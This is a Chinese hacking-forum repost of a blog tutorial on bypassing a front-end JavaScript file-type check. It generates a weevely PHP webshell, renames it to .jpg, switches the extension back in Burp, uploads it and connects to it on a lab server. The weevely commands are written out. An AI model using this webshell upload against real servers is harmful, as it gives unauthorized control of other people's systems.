跳转到帖子
  • 游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

    赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

    TheHackerWorld官方

文件上传(一)基于前端js的破解


Ken1Ve

推荐的帖子

[Meting]
[Music server="netease" id="31877160" type="song"/]
[/Meting]

当我们给web中上传webshell时,通常会遇到基于前端的js验证,来判断是否是jpg或者是png文件,如果不是,则阻断文件的上传。今天,我们一起来分析下,如何绕过前端js文件的验证。

生成PHP版的webshell

kali中执行下面命令:

weevely generate 123456 /root/hacker.php

即,在root目录下生成了一个hacker.phpwebshell
我们上传刚才生成的webshell,则提示如下
2.png
提示,文件格式不对,我们查看原因。
F12键,我们查看源码
3.png
我们得到了下方的代码

function checkFile() {
        var file = document.getElementsByName('upload_file')[0].value;
        if (file == null || file == "") {
            alert("请选择要上传的文件!");
            return false;
        }
        //定义允许上传的文件类型
        var allow_ext = ".jpg|.png|.gif";
        //提取上传文件的类型
        var ext_name = file.substring(file.lastIndexOf("."));
        //判断上传文件类型是否允许上传
        if (allow_ext.indexOf(ext_name) == -1) {
            var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
            alert(errMsg);
            return false;
        }
    }

这是很典型的前端JS判断脚本,ok 我们看看怎样突破来自前端的限制。

  • 1,将我们生的的hacker.php改名为hacker.jpg
  • 2,启动神器burp设置好代理。
    OK,准备好之后,我们开始上传文件。
    4.png
    这时,我们可以看到burp已经抓取了http包内容
    现在我们需要在burp中将hacker.jpg改名为hacker.php然后点击intercept is off放行即可。
    7.png
    如图,我们则成功上传了webshell。点击右键-属性,查看文件上传的位置。
    8.png

用kali连接webshell

weevely http://192.168.232.204/upload/hacker.php 123456

9.png

如上如图,成功获得服务器的权限。

题记

  • 1,本次演示仅在本地服务器测试,请勿非法使用。所造成的一切后果自行承担。
  • 2,后期还会更新其他类型的webshell上传方法,敬请期待。

版权属于:逍遥子大表哥

本文链接:https://blog.bbskali.cn/459.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

链接帖子
意见的链接
分享到其他网站

黑客攻防讨论组

黑客攻防讨论组

    You don't have permission to chat.
    • 最近浏览   0位会员

      • 没有会员查看此页面。
    ×
    ×
    • 创建新的...